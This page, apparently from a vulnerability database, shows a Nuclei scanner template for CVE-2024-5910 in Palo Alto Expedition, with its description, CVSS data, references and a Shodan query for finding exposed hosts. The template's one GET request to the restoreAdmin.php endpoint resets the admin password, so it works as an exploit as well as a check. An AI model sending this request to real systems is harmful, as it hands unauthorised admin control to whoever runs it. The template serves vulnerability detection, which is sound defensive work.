Lucene search
K

Palo Alto Expedition - Admin Account Takeover

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Missing authentication in Palo Alto Expedition allows Admin Account Takeove

Related
Refs
Code
id: CVE-2024-5910

info:
  name: Palo Alto Expedition - Admin Account Takeover
  author: johnk3r
  severity: critical
  description: |
    Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
  impact: |
    Attackers with network access can exploit missing authentication to takeover Expedition admin accounts without credentials.
  remediation: |
    Update Palo Alto Networks Expedition to the latest version that patches CVE-2024-5910 as specified in the Palo Alto security advisory.
  reference:
    - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
    - https://security.paloaltonetworks.com/CVE-2024-5910
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5910
  classification:
    cve-id: CVE-2024-5910
    cvss-score: 9.3
    cwe-id: CWE-306
    epss-score: 0.91783
    epss-percentile: 0.99804
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Admin user found"
          - "Admin password restored"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205c0b802e013a048ea92dbad3e2b601f72821a61046c7dc86c20de28c6096a5e502203f0ff5228c8fb3dec762c4f302672a71902fda118437273f4d1b26d48b873992:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 49.3
EPSS0.91783
SSVC
40